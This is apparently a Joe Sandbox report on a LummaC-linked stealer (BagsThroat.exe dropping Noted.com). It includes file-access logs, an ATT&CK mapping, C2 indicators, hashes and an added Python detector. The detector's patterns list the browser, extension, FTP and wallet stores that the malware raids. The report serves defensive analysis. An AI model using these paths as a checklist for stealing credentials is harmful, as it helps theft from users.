      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
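The file-open entries above are the signature of a stealer sweep: within one run, a single dropped process (Noted.com) reads Chromium Login Data and cookies, dozens of extension storage folders, the Firefox logins.json/key4.db/places.sqlite trio, FTP client configuration folders and desktop wallet directories. No legitimate program touches all of those. The check below is an added example for this page and is not Joe Sandbox code: it turns the report's paths into categories and flags a process either for reading a store owned by another application or for touching several store types at once. The event records are a constructed stand-in for file-access telemetry (Sysmon or object-access audit events), the owner allowlists per category are an assumption, and the 31-letter extension IDs are accepted because a few entries in the report's own list are one letter short of the usual 32.

```python
"""Flag a process that sweeps browser, FTP and wallet stores the way Noted.com does above.

Added example for this report; it is not Joe Sandbox code. The path patterns
are taken from the "File opened" entries in the report. The event records are
a constructed stand-in for file-access telemetry with only the fields this
check needs (process name and accessed path).
"""
import re
from collections import defaultdict

# category -> (pattern over the accessed path, processes expected to touch it).
# Patterns mirror the report's paths; the owner allowlists are an assumption.
# Chrome extension IDs are 32 letters a-p; a few IDs in the report's list are
# one letter short, so 31 is accepted as well.
CATEGORIES = {
    "chromium_logins": (
        re.compile(r"\\User Data\\[^\\]+\\(Login Data( For Account)?|Network\\Cookies)$", re.I),
        {"chrome.exe", "msedge.exe"},
    ),
    "chromium_extension_storage": (
        re.compile(r"\\User Data\\[^\\]+\\(Local|Sync) Extension Settings\\[a-p]{31,32}$", re.I),
        {"chrome.exe", "msedge.exe"},
    ),
    "firefox_secrets": (
        re.compile(r"\\Mozilla\\Firefox\\Profiles(\\[^\\]+\\(logins\.json|key4\.db|places\.sqlite))?$", re.I),
        {"firefox.exe"},
    ),
    # No owner allowlist for the next two: the breadth rule below carries them.
    "ftp_client_config": (
        re.compile(r"\\(FTPbox|FTPGetter|FTPInfo|FTPRush|SmartFTP\\Client 2\.0\\Favorites|SiteDesigner\\3D-FTP)$", re.I),
        set(),
    ),
    "crypto_wallet": (
        re.compile(
            r"\\(Exodus\\exodus\.wallet|Ledger Live|atomic\\Local Storage\\leveldb|Coinomi\\Coinomi\\wallets"
            r"|Bitcoin\\wallets|Binance|com\.liberty\.jaxx\\IndexedDB|Electrum(-LTC)?\\wallets|Guarda\\IndexedDB)$",
            re.I,
        ),
        set(),
    ),
}


def classify_path(path):
    """Return the store category a path falls into, or None for everything else."""
    for name, (pattern, _owners) in CATEGORIES.items():
        if pattern.search(path):
            return name
    return None


def detect_sweeps(events, min_categories=3):
    """Return {process: summary} for processes that look like a credential sweep.

    A process is flagged when it reads a store that belongs to another program
    (a non-browser opening Login Data) or when it touches at least
    `min_categories` distinct store types, which is the pattern in this report:
    Chromium logins, extension storage, Firefox secrets, FTP clients and
    wallets within a single run.
    """
    per_proc = defaultdict(lambda: {"categories": set(), "foreign": set(), "hits": 0})
    for ev in events:
        category = classify_path(ev["path"])
        if category is None:
            continue
        proc = ev["process"].lower()
        rec = per_proc[proc]
        rec["categories"].add(category)
        rec["hits"] += 1
        owners = CATEGORIES[category][1]
        if owners and proc not in owners:
            rec["foreign"].add(category)

    flagged = {}
    for proc, rec in per_proc.items():
        if rec["foreign"] or len(rec["categories"]) >= min_categories:
            flagged[proc] = {
                "categories": sorted(rec["categories"]),
                "foreign": sorted(rec["foreign"]),
                "hits": rec["hits"],
            }
    return flagged


# Constructed events: the first six reproduce paths from the report, the rest
# are benign accesses by the owning applications plus an unrelated file.
SAMPLE_EVENTS = [
    {"process": "Noted.com", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account"},
    {"process": "Noted.com", "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"process": "Noted.com", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"process": "Noted.com", "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db"},
    {"process": "Noted.com", "path": r"C:\Users\user\AppData\Roaming\FTPRush"},
    {"process": "Noted.com", "path": r"C:\Users\user\AppData\Roaming\Electrum\wallets"},
    {"process": "chrome.exe", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": "firefox.exe", "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json"},
    {"process": "explorer.exe", "path": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for proc, summary in detect_sweeps(SAMPLE_EVENTS).items():
        print(proc, summary)
```

On the constructed events only noted.com is flagged: it is foreign to three browser-owned categories and touches five store types in total, while chrome.exe and firefox.exe reading their own stores are left alone. The breadth rule matters more than any single path match, because the browser itself legitimately opens Login Data and a wallet application legitimately opens its own wallet folder; it is the combination, in one process and one session, that separates the stealer from its victims.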

Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP

MITRE ATT&CK Matrix

Techniques carrying a bracketed number are the ones the report highlighted for this sample; the number is the report's own count badge. The remaining entries are the matrix's placeholder techniques.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [131]; Native API [1]; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [12]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading [111]; Virtualization/Sandbox Evasion [22]; Process Injection [12]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]; Input Capture [11]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [22]; Virtualization/Sandbox Evasion [22]; Process Discovery [3]; File and Directory Discovery [13]; System Information Discovery [35]; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture [11]; Archive Collected Data [1]; Data from Local System [31]; Clipboard Data [1]; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [13]; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detection

Initial sample:
Source: BagsThroat.exe | Detection: 24% | Scanner: Virustotal
Source: BagsThroat.exe | Detection: 18% | Scanner: ReversingLabs

Dropped files:
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com | Detection: 0% | Scanner: ReversingLabs
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Managers | Detection: 0% | Scanner: ReversingLabs

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs:
Source: https://crackerdolk.click/api | Detection: 0% | Scanner: Avira URL Cloud | Label: safe

Contacted domains

Name: crackerdolk.click | IP: 104.21.80.1 | Active: true | Malicious: true | Antivirus Detection: none | Reputation: unknown
Name: yHUkiJhYyguIo.yHUkiJhYyguIo | IP: unknown | Active: unknown | Malicious: false | Antivirus Detection: none | Reputation: unknown

Contacted URLs

Name: https://crackerdolk.click/api | Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown

URLs from memory and binaries

Name: http://www.autoitscript.com/autoit3/X | Source: Noted.com, 0000000D.00000000.2054497861.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Noted.com.2.dr, Heights.9.dr | Malicious: false | Reputation: high
Name: http://nsis.sf.net/NSIS_ErrorError | Source: BagsThroat.exe | Malicious: false | Reputation: high
Name: https://www.autoitscript.com/autoit3/ | Source: Noted.com.2.dr, Tim.9.dr | Malicious: false | Reputation: high
Name: http://www.teamviewer.com | Source: BagsThroat.exe | Malicious: false | Reputation: high

Contacted IPs

IP: 104.21.80.1 | Domain: crackerdolk.click | Country: United States | ASN: 13335 | ASN Name: CLOUDFLARENETUS | Malicious: true
General information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581567
Start date and time: 2024-12-28 09:12:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BagsThroat.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@26/23@2/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 25
• Number of non-executed functions: 40
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 2.16.164.105, 2.16.164.72, 20.242.39.171, 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtSetInformationFile calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  Time | Type | Description
                  03:12:53 | API Interceptor | 1x Sleep call for process: BagsThroat.exe modified
                  03:12:58 | API Interceptor | 9x Sleep call for process: Noted.com modified
                  Match: 104.21.80.1
                  Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  SW_48912.scr.exe | Get hash | malicious | FormBook | Browse | www.dejikenkyu.cyou/pmpa/
                  SH8ZyOWNi2.exe | Get hash | malicious | CMSBrute | Browse | hiranetwork.com/administrator/index.php
                  downloader2.hta | Get hash | malicious | XWorm | Browse | 2k8u3.org/wininit.exe
                  No context
                  Match: CLOUDFLARENETUS
                  Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  ronwod.exe | Get hash | malicious | LummaC | Browse | 104.21.92.219
                  ronwod.exe | Get hash | malicious | LummaC | Browse | 172.67.198.222
                  installer_1.05_36.4.exe | Get hash | malicious | LummaC Stealer | Browse | 172.67.166.49
                  Loader.exe | Get hash | malicious | LummaC | Browse | 172.67.132.7
                  Solara-v3.0.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
                  Script.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
                  48.252.190.9.zip | Get hash | malicious | Unknown | Browse | 104.21.95.219
                  https://haleborealis.com | Get hash | malicious | Unknown | Browse | 104.22.72.81
                  External2.4.exe | Get hash | malicious | LummaC | Browse | 104.21.29.252
                  Aura.exe | Get hash | malicious | LummaC | Browse | 104.21.66.86
                  Match: a0e9f5d64349fb13191bc781f81f42e1
                  Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  ronwod.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  ronwod.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  installer_1.05_36.4.exe | Get hash | malicious | LummaC Stealer | Browse | 104.21.80.1
                  Loader.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  Solara-v3.0.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  Script.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  Neverlose.cc-unpadded.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  External2.4.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  Aura.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  Aura.exe | Get hash | malicious | LummaC | Browse | 104.21.80.1
                  Match: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                  Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                  installer_1.05_36.4.exe | Get hash | malicious | LummaC Stealer | Browse |
                  SoftWare(1).exe | Get hash | malicious | LummaC | Browse |
                  !Setup.exe | Get hash | malicious | LummaC Stealer | Browse |
                  ZTM2pfyhu3.exe | Get hash | malicious | LummaC | Browse |
                  JA7cOAGHym.exe | Get hash | malicious | Vidar | Browse |
                  appFile.exe | Get hash | malicious | LummaC Stealer | Browse |
                  FloydMounts.exe | Get hash | malicious | LummaC Stealer | Browse |
                  installer.bat | Get hash | malicious | Vidar | Browse |
                  skript.bat | Get hash | malicious | Vidar | Browse |
                  din.exe | Get hash | malicious | Vidar | Browse |
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):947288
                                      Entropy (8bit):6.630612696399572
                                      Encrypted:false
                                      SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                      MD5:62D09F076E6E0240548C2F837536A46A
                                      SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                      SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                      SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                      • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                      • Filename: !Setup.exe, Detection: malicious, Browse
                                      • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                      • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                      • Filename: appFile.exe, Detection: malicious, Browse
                                      • Filename: FloydMounts.exe, Detection: malicious, Browse
                                      • Filename: installer.bat, Detection: malicious, Browse
                                      • Filename: skript.bat, Detection: malicious, Browse
                                      • Filename: din.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):487086
                                      Entropy (8bit):7.99964339288111
                                      Encrypted:true
                                      SSDEEP:12288:RtTVjKXTKbjRPFuStuOCxV1HhFD3AA8/bJl7Y:Rt9STGjRYS0PPH7D3cbJl7Y
                                      MD5:F11BB6FE0674DB89C1F028537EE8BF79
                                      SHA1:242C35ABE1C29D5F8F9AF3ED9C6FED7989636DF2
                                      SHA-256:CBCE7E0E3E4758A98B555424349F4AD6DDA6E6D76B5D3102A9587064BCAFD8D6
                                      SHA-512:2393665F4976F2D014743144D149311E5128561BD8F1C643A6352515B6791BB421CBF3C4B7D333986678E2C2C03D975D0530781051504673A6926F1C9F58FC2B
                                      Malicious:false
                                      Preview:2..)..QZ7B.......:z...`./.e...W......3j<n..(O.s#...Dz..A...F.7j-....KFM..]...S....!.jb80...u.(o........BK.`9GF.[S.mU...j...K..!..........r....B.)!....n7.i.q.tqpKof....J5:.i..A3..'5.Eq.>./._.e..z.=.v...\3L...Q=.J;v)...m8{..<...Ze..@1$..=..e..\w@.U=P.7............G.}..p@.|.._.S^.j.....'7t..bE.6h?.....?..-...^..'.[T^.l..F....r.....?.:gB..R..6...:Jg......{^.C1...a>I.P...........n.'Q..o)...........N..s.}.i..k........ .;......;.......U...S7.9.Q........K~J../.'......y_-8...E.~0]4.r&..V....&.#...d...R..v..8.gT..k....|v.n../..&.1m.......=..`Wr.k(...2.A5 I.FM>b......L.33..t...3.b.>..;.b..[.N.C...y0s.e.g...y.6P..[$%...lN.....B..PT|f.....3.$....{..;..#...S.f.M2..S..P.9Z.S...X.Y..s.eC-..P..,.z.o..1*...h..Ph:...n....yz%.P.em...9.[/:.I...C........D..T.u...w....~>..'...H..6jzp@.3VO...!N.#e]...t~CL...x.I.....K.>S...'...L...q:.t......r..W>......7xFFW........S..{+N.G...XFv.~...R.....V.K.g......R...\s.._!.&T..P.h.....~...aB.o,.G:zbX.........q....A...!.....dL.p....
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):75776
                                      Entropy (8bit):6.678076006949304
                                      Encrypted:false
                                      SSDEEP:1536:MJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukL:MBRtNPnj0nEoXnmowS2uq
                                      MD5:DAF32A4C4FEFD3D5535967B25263E8BD
                                      SHA1:167FEADA002AA0FDE95F5B07DD210DEE233C3EEA
                                      SHA-256:AF1A7ED88CDE109A083819CCB9B518C64AE54F23BD8DC479A33538C09B7D2000
                                      SHA-512:D8D5AE48277D1DBD622BA4B58F0D8D3A38EBA8C9122BFC326257CE9CD0469B7124403148F593DACCD561BF69EBEABE06BA51001FCD57B8EB5DCD7B17B9A26724
                                      Malicious:false
                                      Preview:..K...q;.r.}.].E..U...C.u..u(.E..].;]...j....u..M..].U...~.+.U..........},..tK..~G..t...........j...[+.3.;.......|.=.................+.;..................B..E.........U(.u......u.J .z....+.}.j.....f.7^...}...t&.M....f......u.3.....+....}.f.....}.R.u.W..b...u.........x....M............U(..+....B<.z..J ..G;.w.4w.._;.s=3.9E......E.......}(f..f..f.M.G j.f...O ....O ...X...._;.r.E.u.].....E..U.....E........u..]..tC.u.j._...+...A...+...B...u........CjxXf.......f....f.B...u.u..u..U...&...U.......Z...C.....+....f;.t...f;.....u..}....t......f..f;...;........f;...-....},.u3..3...P.u(...u..m*.......u...F.jw.4FXf9.t...f....U...........f;.u...G...jw[f9.G.Z..F.t.f............}........f;.t.f;.t..A.j{f..Xj.f..[.o.u...3..u(f..+..u.....j.[............6P.G.WP..y...U....3.j.X.....f;.....j{...I.........f..Xf....F.f....U.f.G..E..t......f..9]...\%..3..E..R%...E..yf...0....E..yf...6%.......f;...5%...E............E...u..U...%...M...u....u..Cb...Cd.U.j.Y.D;E.u..Cf..;M.u....t.U..Ch
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):126976
                                      Entropy (8bit):6.40709763067582
                                      Encrypted:false
                                      SSDEEP:3072:bDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNQ:6O5bLezWWt/Dd314V14ZgP0JaAOz04pC
                                      MD5:FDE0B2F5092759C166D9ADF73DAFFC1A
                                      SHA1:4FF851F5BD76377F622BB20BEDBF8B6319337272
                                      SHA-256:4ECCFFB45EB2D61C23001C2964278D71BEE01564BCEB53EBDF244952F71B0FA6
                                      SHA-512:916223830CAB7E9275EC5B319D2FB65328EBC2B1B13636F4A971623AECC2B364E6F6019DF129F4D6F99B3D67970E2F0D97DF90808331F6AAC03469CB8638ED32
                                      Malicious:false
                                      Preview:.....u...M...M...]..I..I..:N..."......G.......&.....E.S.E...B...Y..PS..6...}..........}...G.......tK.u..&..Y.@...P..D:.8L:.t..@8.@......D:.8L:.t..@8.H....>....t..w...`.I..g.....!2....u:.M.E.P.....,...H..|9...D9.t..@8.@......|9...D9.t..@8.@.._^3.[....U..E.VW..d....@........QQ..$W.E.P.T....}...u.t..E...P.....3.G..3.........F.....3..>_^]...U..h:.G.hD.G.h..G..u..u..O...]...U..M..E.....t0...@..E..E...y.....L..]..E.......D{..I...E......E.. ...]...U... SVW..M.h..I.....u..F........3.~...].v..N..I.......E....U..~..v..N..I.......E....U..E.d...QQ..$W.E..}.P.>....u............U..........}....t.j..u..U....}....u..U....E..}..uD.M......M..\K...........u....M.j.W.2...W.l$..Y.M..E.P......M..k.....j..u..H....3....}..,...H..|....D..t..@8.@......|....D..t..@8.@....../....u6.E...P.4....)...H..D..8T..t..@8.@......D..8T..t..@8.P._^3.[....U..VW.}.....Q..A...t..B...t..P.;.u...;N.u..V.Q.C_...'..N._^]...U..V......K......v..r#...E..Yt.j.V..#..YY..^]...U..V.u.W.N.....J...N.....J...u......N....
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):67584
                                      Entropy (8bit):6.526950976284279
                                      Encrypted:false
                                      SSDEEP:1536:Q1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUp:QZg5PXPeiR6MKkjGWoUlJUp
                                      MD5:5E14DE8FA9A19756C788C622E0EDC1C3
                                      SHA1:D333353E8019085B145EAF35C1F7A177C42A722E
                                      SHA-256:6EBC3AC86AF22FDCCCAC1B35F6B43EEB4B90274567E7914390FCE79735EABBE4
                                      SHA-512:0459B57B3CDA520D9F269635F20F96322A7D1F21C268140AAF866E212A076757B14E4BDE2D56C7DECCB31FBF9350B3BD798BE6A7E2F95632DF7D10316E2F2E55
                                      Malicious:false
                                      Preview:......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):94208
                                      Entropy (8bit):7.997921706643346
                                      Encrypted:true
                                      SSDEEP:1536:5X3dDr1Pu9cXpA4d+XBlNjyeUdokigm0BXI+fWzaVMXZm++qAkHZImLYUVa91ovp:5XxFu9cKXadokF1fWza+w+fHZImLYUgU
                                      MD5:3C9D72E13D302192E829854491F1A500
                                      SHA1:1DFAD70C96FE7064FDC2C13742970B3D3B1FDAED
                                      SHA-256:D9EA9FFD874A8DA9B640F8C47499194261813C00DC660B48BDECE3E4D1D66C20
                                      SHA-512:94BE92932145290E8C9CDD1BED1F0D2EA82EC133182806ABCB2B815491B43EE7885D42583CFDFB4FEDFA506946802DB54BECBE3FA595A2B0D0010CCF7E6BF828
                                      Malicious:false
                                      Preview:..............._..H.....ZI..a..M.^.Z.>....4V..M..Y.........A.n.X..}.I...5.g.$\$...........PcU.dW..D... u.C.W.P.}.._|.X.s.Pu.E}.l...ox...."e.P/.D..H.j+P..]#8..Hl.nv$.6B...2.._.T...3....->=.^ij......@...a......].8......I..a..9........9..jA.&....S~...2...S.8#..;3.......=1.Rr\..@....i.2d^~{.x#........."4...v...-.....th1.0f.!dN.n..>.@....y_..%..xP]@.Y....^....S......L..J.Qr'..(}..Ac.1....t2[..$$.......qj.K.E....>...m..K..*...QmL.....i'.@..........@.}O.h.....8lp..r.l0...1.@T}.C.w. .Fz.D.sm..=.O.Y..?.4..}]!..w..L..QPA.P........j..T..........{Q,.,..j.3..~...A..:P..w../(..n...{b.a.............0$o...CHb......)....:......:.W''M>.%...M..].yn_..m....k.E..7..g............%...;....f..@.l..,..]oW.g=rd...p._x.N5Q.?.j.zy.a...;]q{..jX@.5.W........hN.Ad&...A.V...........p..v....M..!.K.4<,?.........J3..VK..n.....n:"....y.....C.q..E.8.P....\..L..F.5....:.. -X..~6.$/5..9..?...2..^qa......:x|.6c.<h6>x...s#._..w.2.@X.,.k..J.m*.#...E...Oel."..n....
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):73728
                                      Entropy (8bit):7.997730679197705
                                      Encrypted:true
                                      SSDEEP:1536:fk5XgJkNbNRTnUUJu1zaPqltpZWgOa9xC7pxfnyyqFZTsY2C:aXwkNTTne1GKjZHOOgxvyyqFZTr
                                      MD5:B7CECE3F1D2BF71379B06ACDB83F059F
                                      SHA1:6D8DCA5DA7B9CF6EEE41A7778BBD07DB19DBA3F5
                                      SHA-256:DE477736DB9C540B2C160D3B7EB77E5165D3C143A9FEECFCE05424279A52C5AB
                                      SHA-512:F29013F35FC0EFCEDC0721B926389183CBE9BAAB5ABE50943AFEDB8AB40E92B71F6C459A3E49D7BDE30D84050FDF8934797B16D6CA734E292C5591AFE0FAF653
                                      Malicious:false
